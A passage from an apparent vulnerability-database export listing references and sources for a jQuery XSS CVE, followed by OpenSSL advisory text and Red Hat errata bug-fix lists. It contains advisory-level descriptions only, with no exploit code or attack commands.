"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170817",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159876",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159852",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170821",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "156941",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "156315",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170819",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170823",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "156630",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-201801-798",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-98926",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-87212",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-87212"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "159353"
},
{
"db": "PACKETSTORM",
"id": "152787"
},
{
"db": "PACKETSTORM",
"id": "156941"
},
{
"db": "PACKETSTORM",
"id": "156743"
},
{
"db": "NVD",
"id": "CVE-2015-9251"
}
]
},
"id": "VAR-201801-0036",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-87212"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:29:22.127000Z",
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-87212"
},
{
"db": "NVD",
"id": "CVE-2015-9251"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.3,
"url": "https://github.com/jquery/jquery/issues/2432"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/105658"
},
{
"trust": 1.1,
"url": "https://seclists.org/bugtraq/2019/may/18"
},
{
"trust": 1.1,
"url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44601"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20210108-0004/"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"trust": 1.1,
"url": "https://www.tenable.com/security/tns-2019-08"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2019/may/13"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2019/may/11"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2019/may/10"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/152787/dotcms-5.1.1-vulnerable-dependencies.html"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/153237/retirejs-cors-issue-script-execution.html"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/156743/octobercms-insecure-dependencies.html"
},
{
"trust": 1.1,
"url": "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc"
},
{
"trust": 1.1,
"url": "https://github.com/jquery/jquery/pull/2588"
},
{
"trust": 1.1,
"url": "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2"
},
{
"trust": 1.1,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-212-04"
},
{
"trust": 1.1,
"url": "https://snyk.io/vuln/npm:jquery:20150627"
},
{
"trust": 1.1,
"url": "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/securitybulletin_lfsec126.pdf"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2020:0481"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2020:0729"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3cdev.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3cuser.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3cuser.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3ccommits.roller.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3cuser.flink.apache.org%3e"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-9251"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11358"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14040"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2015-9251"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14042"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8331"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2018-14042"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2019-8331"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2018-14040"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2019-11358"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10735"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2016-10735"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14041"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40150"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40150"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-45047"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18214"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40152"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40149"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40149"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40152"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-14041"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2017-18214"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-45693"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46364"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3143"
},
{
"trust": 0.2,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1722"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-20676"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1722"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20676"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20677"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-20677"
},
{
"trust": 0.2,
"url": "https://github.com/twbs/bootstrap/issues/20184"
},
{
"trust": 0.2,
"url": "http://research.insecurelabs.org/jquery/test/"
},
{
"trust": 0.2,
"url": "http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/"
},
{
"trust": 0.2,
"url": "https://bugs.jquery.com/ticket/11974"
},
{
"trust": 0.2,
"url": "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"
},
{
"trust": 0.2,
"url": "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/"
},
{
"trust": 0.2,
"url": "https://github.com/twbs/bootstrap/issues/28236"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3cdev.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3cuser.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3cuser.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3cuser.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3ccommits.roller.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0552"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0556"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=appplatform\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4670"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3936"
},
{
"trust": 0.1,
"url": "https://github.com/dojo/dojo/pull/307"
},
{
"trust": 0.1,
"url": "http://www.cvedetails.com/cve/cve-2008-7220/"
},
{
"trust": 0.1,
"url": "https://dojotoolkit.org/blog/dojo-1-14-released"
},
{
"trust": 0.1,
"url": "https://www.tinymce.com/docs/changelog/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-7220"
},
{
"trust": 0.1,
"url": "http://secureli.com/dotcms-v5-1-1-vulnerable-open-source-dependencies/"
},
{
"trust": 0.1,
"url": "http://prototypejs.org/2008/01/25/prototype-1-6-0-2-bug-fixes-performance-improvements-and-security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9513"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9517"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14379"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11771"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5427"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12422"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9517"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5929"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14439"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.6/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17570"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9513"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17570"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.6.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-5929"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14439"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3802"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12384"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-15756"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-15756"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-16012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12384"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11272"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3802"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:0983"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14379"
},
{
"trust": 0.1,
"url": "https://retirejs.github.io/retire.js/),"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-87212"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "159353"
},
{
"db": "PACKETSTORM",
"id": "152787"
},
{
"db": "PACKETSTORM",
"id": "156941"
},
{
"db": "PACKETSTORM",
"id": "156743"
},
{
"db": "NVD",
"id": "CVE-2015-9251"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-87212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170821",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170817",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159876",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159353",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "152787",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "156941",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "156743",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2015-9251",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2018-01-18T00:00:00",
"db": "VULHUB",
"id": "VHN-87212",
"ident": null
},
{
"date": "2020-11-04T15:29:15",
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"date": "2023-01-31T17:21:40",
"db": "PACKETSTORM",
"id": "170821",
"ident": null
},
{
"date": "2023-01-31T17:16:43",
"db": "PACKETSTORM",
"id": "170817",
"ident": null
},
{
"date": "2020-11-04T15:32:52",
"db": "PACKETSTORM",
"id": "159876",
"ident": null
},
{
"date": "2020-09-30T15:44:20",
"db": "PACKETSTORM",
"id": "159353",
"ident": null
},
{
"date": "2019-05-09T13:33:33",
"db": "PACKETSTORM",
"id": "152787",
"ident": null
},
{
"date": "2020-03-27T13:16:40",
"db": "PACKETSTORM",
"id": "156941",
"ident": null
},
{
"date": "2020-03-15T12:44:44",
"db": "PACKETSTORM",
"id": "156743",
"ident": null
},
{
"date": "2018-01-18T23:29:00.307000",
"db": "NVD",
"id": "CVE-2015-9251",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-01-08T00:00:00",
"db": "VULHUB",
"id": "VHN-87212",
"ident": null
},
{
"date": "2024-11-21T02:40:09.093000",
"db": "NVD",
"id": "CVE-2015-9251",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2020-4847-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "code execution, xss, memory leak",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "159353"
}
],
"trust": 0.3
}
}
VAR-202103-1463
Vulnerability from variot - Updated: 2026-03-09 20:22The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j). OpenSSL is an open source general encryption library of the Openssl team that can implement the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLSv1) protocols. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc.
This issue was reported to OpenSSL on 18th March 2021 by Benjamin Kaduk from Akamai and was discovered by Xiang Ding and others at Akamai. The fix was developed by Tomáš Mráz.
NULL pointer deref in signature_algorithms processing (CVE-2021-3449)
Severity: High
An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack.
A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration).
This issue was reported to OpenSSL on 17th March 2021 by Nokia. The fix was developed by Peter Kästle and Samuel Sapalski from Nokia.
Note
OpenSSL 1.0.2 is out of support and no longer receiving public updates. Extended support is available for premium support customers: https://www.openssl.org/support/contracts.html
OpenSSL 1.1.0 is out of support and no longer receiving updates of any kind.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20210325.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html .
Bug Fix(es):
This update includes various bug fixes and enhancements. Bugs fixed (https://bugzilla.redhat.com/):
1803849 - [RFE] Include per volume encryption with Vault integration in RHCS 4.1 1814681 - [RFE] use topologySpreadConstraints to evenly spread OSDs across hosts 1840004 - CVE-2020-7608 nodejs-yargs-parser: prototype pollution vulnerability 1850089 - OBC CRD is outdated and leads to missing columns in get queries 1860594 - Toolbox pod should have toleration for OCS tainted nodes 1861104 - OCS podDisruptionBudget prevents successful OCP upgrades 1861878 - [RFE] use appropriate PDB values for OSD 1866301 - [RHOCS Usability Study][Installation] “Create storage cluster” should be a part of the installation flow or need to be emphasized as a crucial step. 1915261 - Deleted MCG CRs are stuck in a 'Deleting' state 1915445 - Uninstall 4.7: Storagecluster deletion stuck on a partially created KMS enabled OCS cluster + support TLS configuration for KMS 1915644 - update noobaa db label in must-gather to collect db pod in noobaa dir 1915698 - There is missing noobaa-core-0 pod after upgrade from OCS 4.6 to OCS 4.7 1915706 - [Azure][RBD] PV taking longer time ~ 9 minutes to get deleted 1915730 - [ocs-operator] Create public route for ceph-rgw service 1915737 - Improve ocs-operator logging during uninstall to be more verbose, to understand reasons for failures - e.g. In addition to persistent storage, Red Hat OpenShift Container Storage provisions a multicloud data management service with an S3 compatible API.
Security Fix(es):
- NooBaa: noobaa-operator leaking RPC AuthToken into log files (CVE-2021-3528)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
Currently, a newly restored PVC cannot be mounted if some of the OpenShift Container Platform nodes are running on a version of Red Hat Enterprise Linux which is less than 8.2, and the snapshot from which the PVC was restored is deleted. Workaround: Do not delete the snapshot from which the PVC was restored until the restored PVC is deleted. (BZ#1962483)
-
Previously, the default backingstore was not created on AWS S3 when OpenShift Container Storage was deployed, due to incorrect identification of AWS S3. With this update, the default backingstore gets created when OpenShift Container Storage is deployed on AWS S3. (BZ#1927307)
-
Previously, log messages were printed to the endpoint pod log even if the debug option was not set. With this update, the log messages are printed to the endpoint pod log only when the debug option is set. (BZ#1938106)
-
Previously, the PVCs could not be provisioned as the
rook-ceph-mdsdid not register the pod IP on the monitor servers, and hence every mount on the filesystem timed out, resulting in CephFS volume provisioning failure. With this update, an argument--public-addr=podIPis added to the MDS pod when the host network is not enabled, and hence the CephFS volume provisioning does not fail. (BZ#1949558) -
Previously, OpenShift Container Storage 4.2 clusters were not updated with the correct cache value, and hence MDSs in standby-replay might report an oversized cache, as rook did not apply the
mds_cache_memory_limitargument during upgrades. With this update, themds_cache_memory_limitargument is applied during upgrades and the mds daemon operates normally. (BZ#1951348) -
Previously, the coredumps were not generated in the correct location as rook was setting the config option
log_fileto an empty string since logging happened on stdout and not on the files, and hence Ceph read the value of thelog_fileto build the dump path. With this update, rook does not set thelog_fileand keeps Ceph's internal default, and hence the coredumps are generated in the correct location and are accessible under/var/log/ceph/. (BZ#1938049) -
Previously, Ceph became inaccessible, as the mons lose quorum if a mon pod was drained while another mon was failing over. With this update, voluntary mon drains are prevented while a mon is failing over, and hence Ceph does not become inaccessible. (BZ#1946573)
-
Previously, the mon quorum was at risk, as the operator could erroneously remove the new mon if the operator was restarted during a mon failover. With this update, the operator completes the same mon failover after the operator is restarted, and hence the mon quorum is more reliable in the node drains and mon failover scenarios. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1938106 - [GSS][RFE]Reduce debug level for logs of Nooba Endpoint pod 1950915 - XSS Vulnerability with Noobaa version 5.5.0-3bacc6b 1951348 - [GSS][CephFS] health warning "MDS cache is too large (3GB/1GB); 0 inodes in use by clients, 0 stray files" for the standby-replay 1951600 - [4.6.z][Clone of BZ #1936545] setuid and setgid file bits are not retained after a OCS CephFS CSI restore 1955601 - CVE-2021-3528 NooBaa: noobaa-operator leaking RPC AuthToken into log files 1957189 - [Rebase] Use RHCS4.2z1 container image with OCS 4..6.5[may require doc update for external mode min supported RHCS version] 1959980 - When a node is being drained, increase the mon failover timeout to prevent unnecessary mon failover 1959983 - [GSS][mon] rook-operator scales mons to 4 after healthCheck timeout 1962483 - [RHEL7][RBD][4.6.z clone] FailedMount error when using restored PVC on app pod
Bug Fix(es):
-
WMCO patch pub-key-hash annotation to Linux node (BZ#1945248)
-
LoadBalancer Service type with invalid external loadbalancer IP breaks the datapath (BZ#1952917)
-
Telemetry info not completely available to identify windows nodes (BZ#1955319)
-
WMCO incorrectly shows node as ready after a failed configuration (BZ#1956412)
-
kube-proxy service terminated unexpectedly after recreated LB service (BZ#1963263)
-
Solution:
For Windows Machine Config Operator upgrades, see the following documentation:
